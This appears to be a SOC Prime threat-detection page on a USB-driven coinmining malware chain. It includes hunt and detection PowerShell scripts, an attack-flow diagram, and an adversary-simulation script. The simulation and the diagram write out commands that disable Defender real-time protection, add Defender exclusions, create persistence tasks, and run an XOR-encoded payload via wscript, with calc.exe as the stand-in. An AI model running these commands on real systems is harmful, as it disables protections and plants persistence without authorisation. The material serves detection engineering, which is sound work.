SOC Prime Bias: Medium

02 Dec 2025 20:53

DIRTYBULK and Friends: USB Malware Fuelling Coinmining Ops

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report details a USB-driven infection campaign that leverages malicious shortcut files to deliver a multi-stage malware chain for cryptocurrency mining. Initial execution side-loads a DLL named printui.dll from a fake System32 directory, then hands off to a dropper (CUTFAIL), further deploying a downloader (HIGHREPS) and a backdoor (PUMPBENCH). The PUMPBENCH backdoor communicates with a PostgreSQL server to fetch additional payloads and ultimately launches XMRig miners. The operation maintains persistence through Windows Defender exclusions, scheduled tasks, and rogue services.

Analysis

Mandiant researchers deconstructed the kill chain and highlighted four core malware families: DIRTYBULK, CUTFAIL, HIGHREPS, and PUMPBENCH. They captured the actors’ file naming patterns, the DLL side-loading abuse of printui.dll, registry changes, and associated network indicators. The analysis also charted persistence techniques, including scheduled tasks and services linked to the DCOMLaunch Service Group.

Mitigation

Recommended defenses include blocking execution of shortcut files originating from removable media, monitoring for commands that add Windows Defender exclusions, detecting suspicious printui.dll side-loading activity, and hunting for services or scheduled tasks that use random six-digit names. Applying network controls against known malicious domains and DoH resolvers can further limit command-and-control channels.
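The hunts recommended above can be scripted. The following PowerShell is an added example, not SOC Prime's or Mandiant's detection content; it inspects a host read-only for the trailing-space masquerading directory, a printui.dll loaded from outside the real System32, suspicious Defender exclusions, six-digit service and task names, and out-of-place members of the DcomLaunch svchost group. The six-digit pattern and the exclusion heuristics are assumptions chosen for illustration, and the script needs an elevated session to read process modules and Defender preferences.

```powershell
# Added example (not SOC Prime's or Mandiant's code): a read-only hunt for the host
# artefacts the Mitigation section names. Run in an elevated PowerShell session on a
# Windows host; nothing is changed. The six-digit regex and the exclusion heuristics
# are assumptions chosen for this illustration.
$findings = New-Object System.Collections.Generic.List[string]
$sys32    = Join-Path $env:windir 'System32'   # the real System32, e.g. C:\Windows\System32

# 1. Masquerading directory: a top-level folder whose name ends in a space
#    ("C:\Windows " imitating C:\Windows). Enumeration returns the on-disk name,
#    so comparing it with its trimmed form exposes the trailing space.
Get-ChildItem -LiteralPath "$env:SystemDrive\" -Directory -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -ne $_.Name.TrimEnd() } |
    ForEach-Object { $findings.Add("Trailing-space directory: '$($_.FullName)'") }

# 2. printui.exe with a printui.dll loaded from anywhere but the real System32 (side-loading)
foreach ($proc in @(Get-Process -Name printui -ErrorAction SilentlyContinue)) {
    try {
        foreach ($m in $proc.Modules) {
            if ($m.ModuleName -ieq 'printui.dll' -and
                -not $m.FileName.StartsWith("$sys32\", [System.StringComparison]::OrdinalIgnoreCase)) {
                $findings.Add("printui.exe (PID $($proc.Id)) loaded $($m.FileName)")
            }
        }
    } catch {
        $findings.Add("printui.exe (PID $($proc.Id)): could not read modules ($($_.Exception.Message))")
    }
}

# 3. Defender exclusions: flag a path with a space before a backslash or at its end
#    (the trailing-space trick) or one that sits under a user profile
$exclusions = @((Get-MpPreference -ErrorAction SilentlyContinue).ExclusionPath)
foreach ($p in $exclusions) {
    if ($p -and ($p -match ' \\' -or $p -match ' $' -or $p -like "$env:SystemDrive\Users\*")) {
        $findings.Add("Suspicious Defender exclusion: '$p'")
    }
}

# 4. Services and scheduled tasks whose names are exactly six digits
foreach ($s in @(Get-CimInstance Win32_Service | Where-Object { $_.Name -match '^\d{6}$' })) {
    $findings.Add("Six-digit service: $($s.Name) -> $($s.PathName)")
}
foreach ($t in @(Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object { $_.TaskName -match '^\d{6}$' })) {
    $findings.Add("Six-digit scheduled task: $($t.TaskPath)$($t.TaskName)")
}

# 5. Members of the DcomLaunch svchost group whose name is six digits or whose
#    ServiceDll lives outside the real System32
$svchost = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost'
foreach ($svc in @($svchost.DcomLaunch)) {
    $dll = (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\$svc\Parameters" -Name ServiceDll -ErrorAction SilentlyContinue).ServiceDll
    if ($dll) { $dll = [Environment]::ExpandEnvironmentVariables($dll) }
    if ($svc -match '^\d{6}$' -or ($dll -and $dll -notlike "$sys32\*")) {
        $findings.Add("DcomLaunch group member '$svc' with ServiceDll '$dll'")
    }
}

if ($findings.Count -eq 0) { 'No DIRTYBULK-style artefacts found.' } else { $findings }
```

Because Win32 path normalization strips trailing spaces, `Test-Path 'C:\Windows \'` would silently resolve to the real `C:\Windows`; enumerating the drive root and comparing each name with its trimmed form is what actually surfaces the fake directory.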

Response

Once detected, isolate the impacted host, remove the malicious DLL and related components, delete the malicious scheduled task and service entries, and restore Windows Defender settings by clearing exclusions. Perform comprehensive forensic scanning to uncover residual payloads and track connections to the identified PostgreSQL C2 infrastructure. Finally, update detection content to cover the observed command-line usage and file creation behaviors.
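To show what "detection content covering the observed command-line usage" looks like in practice, here is an added PowerShell example, not SOC Prime's or Mandiant's rule logic. It applies a small rule set to constructed process-creation events that mimic the command lines described in this report. The field names (Image, CommandLine, ParentImage) follow the Sysmon Event ID 1 convention; the events, paths and the six-digit name are invented for the illustration, and treating any drive other than the system drive as removable is an assumption.

```powershell
# Added example (not SOC Prime's or Mandiant's detection content): command-line
# rules run over constructed process-creation events. Field names follow Sysmon
# Event ID 1; every event below is invented for this illustration.
$sys32 = "$env:windir\System32"   # the real System32, e.g. C:\Windows\System32

$events = @(
    @{ Image = 'C:\Windows\System32\wscript.exe'
       CommandLine = '"C:\Windows\System32\wscript.exe" "E:\x3f9a2c.vbs"'
       ParentImage = 'C:\Windows\explorer.exe' }
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell -Command "Add-MpPreference -ExclusionPath ''C:\Windows \''"'
       ParentImage = 'C:\Windows \System32\printui.exe' }
    @{ Image = 'C:\Windows \System32\printui.exe'
       CommandLine = 'printui.exe'
       ParentImage = 'C:\Windows\System32\wscript.exe' }
    @{ Image = 'C:\Windows\System32\schtasks.exe'
       CommandLine = 'schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
    @{ Image = 'C:\Windows\System32\sc.exe'
       CommandLine = 'sc create 483920 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch"'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
    @{ Image = 'C:\Windows\System32\notepad.exe'                 # benign control event
       CommandLine = 'notepad.exe C:\Users\alice\notes.txt'
       ParentImage = 'C:\Windows\explorer.exe' }
)

# Each rule is a scriptblock taking one event; -match is case-insensitive by default.
$rules = [ordered]@{
    # Script host started with a script on a drive other than the system drive
    # (assumed here to be removable media)
    'ScriptHostFromRemovableDrive' = {
        param($e)
        $e.Image -match '\\(w|c)script\.exe$' -and
        $e.CommandLine -match '\s"?[D-Z]:\\[^"]*\.(vbs|vbe|js|wsf)"?'
    }
    # Defender tampering: exclusions added or real-time protection switched off
    'DefenderPreferenceTampering' = {
        param($e)
        $e.CommandLine -match '(Add|Set)-MpPreference\s+-(ExclusionPath|DisableRealtimeMonitoring)'
    }
    # printui.exe executing from anywhere but the real System32 (masquerading directory)
    'PrintuiOutsideSystem32' = {
        param($e)
        $e.Image -match '\\printui\.exe$' -and
        -not $e.Image.StartsWith("$sys32\", [System.StringComparison]::OrdinalIgnoreCase)
    }
    # Logon-triggered scheduled task requesting the highest run level
    'OnLogonHighestTask' = {
        param($e)
        $e.CommandLine -match 'schtasks.*/create.*/sc\s+onlogon' -and
        $e.CommandLine -match '/rl\s+highest'
    }
    # Service or task created with a six-digit name
    'SixDigitServiceOrTask' = {
        param($e)
        $e.CommandLine -match '(sc(\.exe)?\s+create\s+|/tn\s+"?)\d{6}(\s|"|$)'
    }
}

function Invoke-Rules {
    param([hashtable[]]$Events, $Rules = $rules)
    foreach ($e in $Events) {
        $hits = @($Rules.Keys | Where-Object { & $Rules[$_] $e })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{ Image = $e.Image; Matched = ($hits -join ', '); CommandLine = $e.CommandLine }
        }
    }
}

# The first five constructed events each match one rule; the notepad event matches none.
Invoke-Rules -Events $events | Format-Table -AutoSize -Wrap
```

The rules are deliberately narrow so they can be unit-tested against the regression script later on this page: the ScriptHostFromRemovableDrive rule will not fire on a script written to `%TEMP%` on the system drive, which is the kind of gap a regression run is meant to expose.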

Attack Flow

```mermaid
graph TB
    %% Class Definitions
    classDef action fill:#99ccff
    classDef tool fill:#ffcc99
    classDef file fill:#ffff99
    classDef process fill:#ff9999
    classDef service fill:#ccffcc
    classDef command fill:#dddddd
    classDef malware fill:#ffb6c1

    %% Initial infection via removable media
    node_usb_insert["<b>Action</b> – <b>T1674 Input Injection</b>: Victim inserts USB containing malicious shortcut"]
    class node_usb_insert action
    node_lnk["<b>File</b> – <b>Malicious Shortcut</b> (USB Drive.lnk)"]
    class node_lnk file
    node_wscript["<b>Tool</b> – <b>wscript.exe</b>: Executes VBScript"]
    class node_wscript tool
    node_vbs["<b>File</b> – <b>VBScript</b> (x??????.vbs)"]
    class node_vbs file
    node_shortcut_mod["<b>Action</b> – <b>T1547.009 Shortcut Modification</b>: LNK used for persistence"]
    class node_shortcut_mod action

    %% Masquerading and side-loading
    node_masq_dir["<b>File</b> – <b>Fake Directory</b> C:\\Windows#lt;space#gt;\\System32 (trailing space)"]
    class node_masq_dir file
    node_printui_exe["<b>Process</b> – <b>printui.exe</b> (legitimate)"]
    class node_printui_exe process
    node_printui_dll["<b>File</b> – <b>printui.dll</b> (malicious)"]
    class node_printui_dll file
    node_dll_hijack["<b>Action</b> – <b>T1574.001 Hijack Execution Flow: DLL</b>"]
    class node_dll_hijack action

    %% Defense evasion via PowerShell profile
    node_ps_exclusion["<b>Command</b> – Add-MpPreference -ExclusionPath #quot;C:\\Windows #lt;space#gt;\\#quot;"]
    class node_ps_exclusion command
    node_ps_profile["<b>Action</b> – <b>T1546.013 PowerShell Profile</b>: Executes exclusion command"]
    class node_ps_profile action

    %% Persistence through service and scheduled task
    node_service_create["<b>Action</b> – <b>T1543.003 Create Windows Service</b>"]
    class node_service_create action
    node_service["<b>Service</b> – <b>123456</b> created under DcomLaunch with ServiceDll"]
    class node_service service
    node_scheduled_task["<b>Command</b> – schtasks /create /tn #quot;console_zero#quot; /sc ONLOGON /tr #quot;C:\\Windows\\System32\\console_zero.exe#quot; /rl HIGHEST /f"]
    class node_scheduled_task command
    node_task_action["<b>Action</b> – <b>T1037.001 Logon Script</b>: Runs console_zero.exe on user logon"]
    class node_task_action action

    %% C2 resolution via DoH and fast flux
    node_doh["<b>Tool</b> – DNS-over-HTTPS queries to dns.google"]
    class node_doh tool
    node_fastflux["<b>Action</b> – <b>T1568.001 Fast Flux DNS</b> and <b>T1568.003 DNS Calculation</b>"]
    class node_fastflux action

    %% Resource hijacking – cryptocurrency mining
    node_xmrig["<b>Malware</b> – XMRig miner"]
    class node_xmrig malware
    node_mining["<b>Action</b> – <b>T1496.001 Resource Hijacking</b>: Cryptomining on compromised host"]
    class node_mining action

    %% Connections
    node_usb_insert -->|contains| node_lnk
    node_lnk -->|executes| node_wscript
    node_wscript -->|runs| node_vbs
    node_vbs -->|creates masquerading directory| node_masq_dir
    node_vbs -->|copies legitimate executable| node_printui_exe
    node_vbs -->|replaces DLL with malicious version| node_printui_dll
    node_printui_exe -->|loads| node_dll_hijack
    node_dll_hijack -->|loads malicious DLL| node_printui_dll
    node_printui_dll -->|triggers| node_ps_exclusion
    node_ps_exclusion -->|executed via| node_ps_profile
    node_ps_profile -->|creates| node_service_create
    node_service_create -->|creates| node_service
    node_service -->|enables| node_scheduled_task
    node_scheduled_task -->|runs on logon| node_task_action
    node_task_action -->|downloads C2 address via| node_doh
    node_doh -->|uses| node_fastflux
    node_fastflux -->|provides address for| node_xmrig
    node_xmrig -->|executes| node_mining
```

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Stage 1 – Drop a malicious VBScript on the compromised USB drive (e.g., E:\payload.vbs). The script disables Windows Defender real-time protection using Set-MpPreference (the cmdlet that owns the -DisableRealtimeMonitoring parameter), XOR-encodes a payload with a single-byte key, and creates a scheduled task for persistence.

    2. Stage 2 – Execute the script via wscript.exe, passing the persistence command line directly (to satisfy the rule's conjunctive condition).

    3. Stage 3 – The script internally invokes PowerShell to run the encrypted payload, demonstrating the “infection chain”.

    4. Stage 4 – After execution, the attacker cleans up artifacts (removes the script, deletes the scheduled task).

  • Regression Test Script:

    # ------------------------------------------------------------
    # Regression Test - Malware Infection Chain Simulation
    # ------------------------------------------------------------
    $scriptPath = "$env:TEMP\payload.vbs"
    $taskName   = "WinUpdateTask"
    $xorKey     = 0x5A

    # -- 1. Create XOR-encoded dummy payload -----------------------------------
    # Each UTF-16 code unit of the payload is XORed with the key and written as
    # four hex digits, which is the format the VBScript decoder below expects.
    $plainPayload = "calc.exe"
    $encrypted = -join ($plainPayload.ToCharArray() | ForEach-Object {
        '{0:X4}' -f ([int][char]$_ -bxor $xorKey)
    })

    # -- 2. Build the command the scheduled task will run (benign stand-in) ------
    $taskCommand = [Convert]::ToBase64String(
        [System.Text.Encoding]::Unicode.GetBytes('Start-Process calc.exe'))

    # -- 3. Write the VBScript (a doubled quote is VBScript's escape for ") ------
    @"
    ' VBScript - simulated infection chain
    Set sh = CreateObject("WScript.Shell")

    ' Disable real-time protection (-DisableRealtimeMonitoring belongs to Set-MpPreference)
    sh.Run "powershell -Command ""Set-MpPreference -DisableRealtimeMonitoring `$true""", 0, True

    ' Create scheduled task for persistence
    sh.Run "schtasks /Create /SC ONLOGON /TN $taskName /TR ""powershell -EncodedCommand $taskCommand"" /F", 0, True

    ' Decode and execute payload: four hex digits per character, XORed with the key
    Dim encData, decData, i
    encData = "$encrypted"
    decData = ""
    For i = 1 To Len(encData) Step 4
        decData = decData & ChrW(CLng("&H" & Mid(encData, i, 4)) Xor $xorKey)
    Next
    sh.Run decData, 0, False
    "@ | Set-Content -Encoding ASCII $scriptPath

    # -- 4. Execute the script via wscript.exe (triggers the rule) -------------
    # Host options such as //B must come before the script path.
    wscript.exe //B "$scriptPath"

    # -- 5. (Optional) Wait a few seconds for the task to fire ----------------
    Start-Sleep -Seconds 10

    # ------------------------------------------------------------
    # Cleanup - remove script and scheduled task, restore Defender
    # ------------------------------------------------------------
    Remove-Item $scriptPath -Force
    schtasks /Delete /TN $taskName /F
    Set-MpPreference -DisableRealtimeMonitoring $false

  • Cleanup Commands:

    # Remove residual scheduled task (if still present)
    schtasks /Delete /TN "WinUpdateTask" /F
    
    # Remove any lingering script files
    Remove-Item "$env:TEMP\payload.vbs" -ErrorAction SilentlyContinue
    
    # Re-enable real-time protection (-DisableRealtimeMonitoring is a Set-MpPreference parameter)
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $false"